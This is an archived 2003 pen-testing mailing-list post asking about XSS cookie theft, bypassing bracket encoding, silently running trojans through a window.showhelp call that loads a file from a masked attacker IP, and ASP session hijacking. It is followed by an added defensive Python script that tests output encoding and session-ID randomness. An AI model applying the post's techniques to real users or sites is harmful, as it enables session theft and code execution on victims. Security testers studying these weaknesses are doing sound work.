RE: Proof of Concept Tool on Web Application Security

From: Indian Tiger (indiantiger@mailandnews.com)
Date: 04/23/03

  • Next message: Ollie Whitehouse: "@stake port announcement: ncpquery for win32 now posted to razor.bindview.com"
    From: "Indian Tiger" <indiantiger@mailandnews.com>
    To: "pen test" <Pen-test@securityfocus.com>
    Date: Wed, 23 Apr 2003 12:50:54 +0530

    Hey Everybody,

    First of all thank you very much to Robert, Rogan, Steve, Nicolas and Leah
    for their guidance to test XSS and Session ID brute force attack.

    Now I can transfer victim’s cookie to another location successfully. I have
    tested XSS to transfer cookie using following three ways:
    1. Using document.location
    2. Using Image src
    3. Using hidden fields

    The cookie which I am getting is of the current application only, meaning if
    I am accessing www.hotmail.com I will be getting only Hotmail's session ID
    assigned to me for that session.

    Now how can I steal all cookies stored on the victim's machine? Or how to
    transfer a file from the victim machine using Client Side Scripting or any
    other way?

    Some sites convert < and > tags into &lt; and &gt; to protect themselves
    from XSS attacks. Is there any way to bypass this protection?

    I was testing some trojan execution using XSS. In this process I was able to
    run the help file 31users.chm from the attacker's machine on the victim's
    machine as follows:
    window.showhelp(file:///XXX. XXX. XXX. XXX/c:/windows/help/31users.chm)
    Is it possible to run some trojan or ActiveX component instead of a help
    file, without alerting for any pop-up?
    Is it possible to write some malicious help file? (These files do not even
    ask before execution.)

    As per iDEFENSE's article on "Brute Forcing Session ID", sometimes the session
    ID is random. I have tested this against six sites and I was not very lucky in
    getting session IDs in which only the last 3-4 digits change.
    What do you think, in practice are they still so? Since iDEFENSE published
    this research in Nov 2001, the current scenario might be a bit changed.

    In my research of six sites, four sites were using the ASP session variable
    to generate the session ID and the remaining two their own.

    I was able to hijack ASP sessions using session IDs. In my testing, first I
    logged in as user1, got his session ID and, using user1's session ID, I was
    able to hijack user1.

    Any help on this would be highly appreciated.

    Thanking You.
    Sincerely,

    Indian Tiger, CISSP

    ---------------------------------------------------------------------------
    Attend Black Hat Briefings & Training Europe, May 12-15 in Amsterdam, the
    world's premier event for IT and network security experts. The two-day
    Training features 6 hand-on courses on May 12-13 taught by professionals.
    The two-day Briefings on May 14-15 features 24 top speakers with no vendor
    sales pitches. Deadline for the best rates is April 25. Register today to
    ensure your place. http://www.securityfocus.com/BlackHat-pen-test
    ----------------------------------------------------------------------------
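Two of the questions above concern checks a defender runs on the application side: whether an output filter that only encodes < and > is complete, and whether consecutively issued session IDs vary enough to resist guessing. The following Python script is an added example, not code from the poster or from iDEFENSE; the session IDs in WEAK_IDS are constructed for illustration, and the weak_filter / escape_html / assess_session_ids names are this example's own.

```python
import html
import secrets

# Constructed sample: five IDs issued one after another by a hypothetical
# application whose generator only bumps a counter in the last digits.
# This is the "only the last 3-4 digits change" pattern described above.
WEAK_IDS = [
    "A7F3B2C19E4D000117",
    "A7F3B2C19E4D000118",
    "A7F3B2C19E4D000119",
    "A7F3B2C19E4D000120",
    "A7F3B2C19E4D000121",
]


def strong_ids(n, nbytes=16):
    """IDs drawn from the OS CSPRNG: what a defender should expect to see."""
    return [secrets.token_hex(nbytes) for _ in range(n)]


def weak_filter(text):
    """The filter the post describes: only angle brackets are encoded.
    Quotes and ampersands pass through, so a value reflected inside a quoted
    attribute is not protected by it."""
    return text.replace("<", "&lt;").replace(">", "&gt;")


def escape_html(text):
    """Encode &, <, >, double and single quotes, which covers both text
    nodes and quoted attribute values (html.escape with quote=True)."""
    return html.escape(text, quote=True)


def varying_positions(ids):
    """Indexes at which the sampled IDs differ at all. Positions that never
    change contribute nothing to the effective search space."""
    width = len(ids[0])
    if any(len(i) != width for i in ids):
        raise ValueError("session IDs of unequal length")
    return [p for p in range(width) if len({i[p] for i in ids}) > 1]


def suffix_is_counter(ids, digits=4):
    """True when the last `digits` characters are decimal and increase by
    exactly one from one issued ID to the next."""
    try:
        tail = [int(i[-digits:]) for i in ids]
    except ValueError:
        return False  # non-decimal suffix, so not a plain counter
    return all(b - a == 1 for a, b in zip(tail, tail[1:]))


def assess_session_ids(ids):
    """Summarise how much of the ID actually varies across a sample."""
    pos = varying_positions(ids)
    width = len(ids[0])
    return {
        "length": width,
        "varying_positions": len(pos),
        "varying_fraction": len(pos) / width,
        "counter_suffix": suffix_is_counter(ids),
    }


if __name__ == "__main__":
    print("weak filter  :", weak_filter('x"y<b>'))
    print("full encoding:", escape_html('x"y<b>'))
    print("weak IDs     :", assess_session_ids(WEAK_IDS))
    print("strong IDs   :", assess_session_ids(strong_ids(20)))
```

The ID assessment is deliberately crude: it only needs a handful of IDs issued in succession to show that, for the constructed sample, two of eighteen characters ever change and the tail is a counter, whereas CSPRNG-generated IDs vary in every position. Encoding with html.escape(quote=True) rather than replacing only the two angle brackets is the usual fix for the filter weakness the post asks about.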

